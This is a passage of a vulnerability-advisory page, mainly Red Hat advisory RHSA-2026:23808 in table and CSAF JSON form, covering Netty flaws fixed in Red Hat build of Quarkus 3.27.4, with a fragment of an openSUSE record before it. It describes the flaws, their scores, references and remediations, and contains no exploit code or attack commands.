"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-44248"
}
]
}
RHSA-2026:23808
Vulnerability from csaf_redhat - Published: 2026-06-10 12:05 - Updated: 2026-07-03 12:02A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.27.4
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.27::el8
|
— |
Vendor Fix
fix
|
A flaw was found in Netty. Netty's DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.27.4
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.27::el8
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty's HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.27.4
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.27::el8
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.27.4
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.27::el8
|
— |
Vendor Fix
fix
|
A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat build of Quarkus 3.27.4
Red Hat / Red Hat build of Quarkus
|
cpe:/a:redhat:quarkus:3.27::el8
|
— |
Vendor Fix
fix
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:23808 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://access.redhat.com/products/quarkus/ | external |
| https://access.redhat.com/jbossnetwork/restricted… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://issues.redhat.com/browse/QUARKUS-6793 | external |
| https://issues.redhat.com/browse/QUARKUS-7610 | external |
| https://issues.redhat.com/browse/QUARKUS-7615 | external |
| https://issues.redhat.com/browse/QUARKUS-7616 | external |
| https://issues.redhat.com/browse/QUARKUS-7617 | external |
| https://issues.redhat.com/browse/QUARKUS-7618 | external |
| https://issues.redhat.com/browse/QUARKUS-7619 | external |
| https://issues.redhat.com/browse/QUARKUS-7620 | external |
| https://issues.redhat.com/browse/QUARKUS-7621 | external |
| https://issues.redhat.com/browse/QUARKUS-7622 | external |
| https://issues.redhat.com/browse/QUARKUS-7623 | external |
| https://issues.redhat.com/browse/QUARKUS-7624 | external |
| https://issues.redhat.com/browse/QUARKUS-7625 | external |
| https://issues.redhat.com/browse/QUARKUS-7626 | external |
| https://issues.redhat.com/browse/QUARKUS-7627 | external |
| https://issues.redhat.com/browse/QUARKUS-7628 | external |
| https://issues.redhat.com/browse/QUARKUS-7630 | external |
| https://issues.redhat.com/browse/QUARKUS-7631 | external |
| https://issues.redhat.com/browse/QUARKUS-7632 | external |
| https://issues.redhat.com/browse/QUARKUS-7633 | external |
| https://issues.redhat.com/browse/QUARKUS-7664 | external |
| https://issues.redhat.com/browse/QUARKUS-7774 | external |
| https://issues.redhat.com/browse/QUARKUS-7775 | external |
| https://issues.redhat.com/browse/QUARKUS-7776 | external |
| https://issues.redhat.com/browse/QUARKUS-7777 | external |
| https://issues.redhat.com/browse/QUARKUS-7778 | external |
| https://issues.redhat.com/browse/QUARKUS-7779 | external |
| https://issues.redhat.com/browse/QUARKUS-7780 | external |
| https://issues.redhat.com/browse/QUARKUS-7781 | external |
| https://issues.redhat.com/browse/QUARKUS-7812 | external |
| https://issues.redhat.com/browse/QUARKUS-7813 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-42578 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477226 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42578 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42578 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42579 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477217 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42579 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42579 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42581 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477232 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42581 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42581 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42584 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477224 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42584 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42584 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42587 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42587 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42587 | external |
| https://github.com/netty/netty/security/advisorie… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat build of Quarkus.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This release of Red Hat build of Quarkus 3.27.4 includes the following CVE fixes:\n\n* netty-codec-dns: Netty: High integrity impact due to improper DNS domain name constraint enforcement [quarkus-3.27] (CVE-2026-42579)\n\n* netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion [quarkus-3.27] (CVE-2026-42584)\n\n* netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers [quarkus-3.27] (CVE-2026-42581)\n\n* netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation [quarkus-3.27] (CVE-2026-42578)\n\n* netty-codec-http: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression [quarkus-3.27] (CVE-2026-42587)\n\n* netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression [quarkus-3.27] (CVE-2026-42587)\n\nFor more information, see the release notes page listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:23808",
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/products/quarkus/",
"url": "https://access.redhat.com/products/quarkus/"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=redhat.quarkus\u0026downloadType=distributions\u0026version=3.27.4",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=redhat.quarkus\u0026downloadType=distributions\u0026version=3.27.4"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_build_of_quarkus/3.27",
"url": "https://docs.redhat.com/en/documentation/red_hat_build_of_quarkus/3.27"
},
{
"category": "external",
"summary": "QUARKUS-6793",
"url": "https://issues.redhat.com/browse/QUARKUS-6793"
},
{
"category": "external",
"summary": "QUARKUS-7610",
"url": "https://issues.redhat.com/browse/QUARKUS-7610"
},
{
"category": "external",
"summary": "QUARKUS-7615",
"url": "https://issues.redhat.com/browse/QUARKUS-7615"
},
{
"category": "external",
"summary": "QUARKUS-7616",
"url": "https://issues.redhat.com/browse/QUARKUS-7616"
},
{
"category": "external",
"summary": "QUARKUS-7617",
"url": "https://issues.redhat.com/browse/QUARKUS-7617"
},
{
"category": "external",
"summary": "QUARKUS-7618",
"url": "https://issues.redhat.com/browse/QUARKUS-7618"
},
{
"category": "external",
"summary": "QUARKUS-7619",
"url": "https://issues.redhat.com/browse/QUARKUS-7619"
},
{
"category": "external",
"summary": "QUARKUS-7620",
"url": "https://issues.redhat.com/browse/QUARKUS-7620"
},
{
"category": "external",
"summary": "QUARKUS-7621",
"url": "https://issues.redhat.com/browse/QUARKUS-7621"
},
{
"category": "external",
"summary": "QUARKUS-7622",
"url": "https://issues.redhat.com/browse/QUARKUS-7622"
},
{
"category": "external",
"summary": "QUARKUS-7623",
"url": "https://issues.redhat.com/browse/QUARKUS-7623"
},
{
"category": "external",
"summary": "QUARKUS-7624",
"url": "https://issues.redhat.com/browse/QUARKUS-7624"
},
{
"category": "external",
"summary": "QUARKUS-7625",
"url": "https://issues.redhat.com/browse/QUARKUS-7625"
},
{
"category": "external",
"summary": "QUARKUS-7626",
"url": "https://issues.redhat.com/browse/QUARKUS-7626"
},
{
"category": "external",
"summary": "QUARKUS-7627",
"url": "https://issues.redhat.com/browse/QUARKUS-7627"
},
{
"category": "external",
"summary": "QUARKUS-7628",
"url": "https://issues.redhat.com/browse/QUARKUS-7628"
},
{
"category": "external",
"summary": "QUARKUS-7630",
"url": "https://issues.redhat.com/browse/QUARKUS-7630"
},
{
"category": "external",
"summary": "QUARKUS-7631",
"url": "https://issues.redhat.com/browse/QUARKUS-7631"
},
{
"category": "external",
"summary": "QUARKUS-7632",
"url": "https://issues.redhat.com/browse/QUARKUS-7632"
},
{
"category": "external",
"summary": "QUARKUS-7633",
"url": "https://issues.redhat.com/browse/QUARKUS-7633"
},
{
"category": "external",
"summary": "QUARKUS-7664",
"url": "https://issues.redhat.com/browse/QUARKUS-7664"
},
{
"category": "external",
"summary": "QUARKUS-7774",
"url": "https://issues.redhat.com/browse/QUARKUS-7774"
},
{
"category": "external",
"summary": "QUARKUS-7775",
"url": "https://issues.redhat.com/browse/QUARKUS-7775"
},
{
"category": "external",
"summary": "QUARKUS-7776",
"url": "https://issues.redhat.com/browse/QUARKUS-7776"
},
{
"category": "external",
"summary": "QUARKUS-7777",
"url": "https://issues.redhat.com/browse/QUARKUS-7777"
},
{
"category": "external",
"summary": "QUARKUS-7778",
"url": "https://issues.redhat.com/browse/QUARKUS-7778"
},
{
"category": "external",
"summary": "QUARKUS-7779",
"url": "https://issues.redhat.com/browse/QUARKUS-7779"
},
{
"category": "external",
"summary": "QUARKUS-7780",
"url": "https://issues.redhat.com/browse/QUARKUS-7780"
},
{
"category": "external",
"summary": "QUARKUS-7781",
"url": "https://issues.redhat.com/browse/QUARKUS-7781"
},
{
"category": "external",
"summary": "QUARKUS-7812",
"url": "https://issues.redhat.com/browse/QUARKUS-7812"
},
{
"category": "external",
"summary": "QUARKUS-7813",
"url": "https://issues.redhat.com/browse/QUARKUS-7813"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_23808.json"
}
],
"title": "Red Hat Security Advisory: Red Hat build of Quarkus 3.27.4 release and security update",
"tracking": {
"current_release_date": "2026-07-03T12:02:49+00:00",
"generator": {
"date": "2026-07-03T12:02:49+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.1"
}
},
"id": "RHSA-2026:23808",
"initial_release_date": "2026-06-10T12:05:35+00:00",
"revision_history": [
{
"date": "2026-06-10T12:05:35+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-10T12:05:35+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-03T12:02:49+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat build of Quarkus 3.27.4",
"product": {
"name": "Red Hat build of Quarkus 3.27.4",
"product_id": "Red Hat build of Quarkus 3.27.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quarkus:3.27::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat build of Quarkus"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-42578",
"cwe": {
"id": "CWE-93",
"name": "Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)"
},
"discovery_date": "2026-05-13T19:02:00.826936+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477226"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.27.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "RHBZ#2477226",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477226"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42578",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42578"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr",
"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr"
}
],
"release_date": "2026-05-13T17:57:43.538000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:05:35+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-handler-proxy: Netty: HTTP Header Injection via HttpProxyHandler Disabled Validation"
},
{
"cve": "CVE-2026-42579",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-05-13T19:01:25.062732+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477217"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. Netty\u0027s DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important integrity flaw in Netty\u0027s DNS codec. The vulnerability arises from insufficient enforcement of RFC 1035 domain name constraints during both encoding and decoding, allowing remote attackers to manipulate DNS responses or user-controlled hostnames. This could lead to a high integrity impact on affected Red Hat products that utilize the vulnerable Netty DNS codec.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.27.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "RHBZ#2477217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477217"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42579",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42579"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm",
"url": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm"
}
],
"release_date": "2026-05-13T18:01:52.500000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:05:35+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement"
},
{
"cve": "CVE-2026-42581",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:02:26.404511+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477232"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw. Netty\u0027s HttpObjectDecoder, used across various Red Hat products, improperly handles conflicting `Transfer-Encoding: chunked` and `Content-Length` headers in HTTP/1.0 requests. This allows a remote attacker to perform HTTP request smuggling, potentially bypassing security controls or gaining unauthorized access to information due to misinterpretation of message boundaries by downstream proxies or handlers.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.27.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "RHBZ#2477232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477232"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42581",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42581"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9",
"url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9"
}
],
"release_date": "2026-05-13T17:54:44.492000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:05:35+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
},
{
"category": "workaround",
"details": "To mitigate this issue, configure any reverse proxies or load balancers in front of Netty to either reject HTTP/1.0 requests containing both Transfer-Encoding: chunked and Content-Length headers, or to explicitly prioritize the Transfer-Encoding header over Content-Length for HTTP/1.0 traffic. This ensures consistent interpretation of message boundaries and prevents request smuggling attacks.",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers"
},
{
"cve": "CVE-2026-42584",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:01:51.846351+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477224"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: A flaw in Netty\u0027s HttpClientCodec allows a remote attacker to cause data confusion. By sending a specially crafted sequence of HTTP responses, an attacker can cause subsequent HTTP responses to be parsed incorrectly, potentially leading to information disclosure or data integrity issues in applications utilizing Netty for HTTP client operations. This vulnerability affects various Red Hat products that bundle Netty, including Red Hat AMQ, Enterprise Application Platform, Red Hat Build of Quarkus, and Red Hat Build of Keycloak.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.27.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "RHBZ#2477224",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477224"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42584",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42584"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3",
"url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3"
}
],
"release_date": "2026-05-13T18:10:48.437000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:05:35+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.27.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.27.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion"
},
{
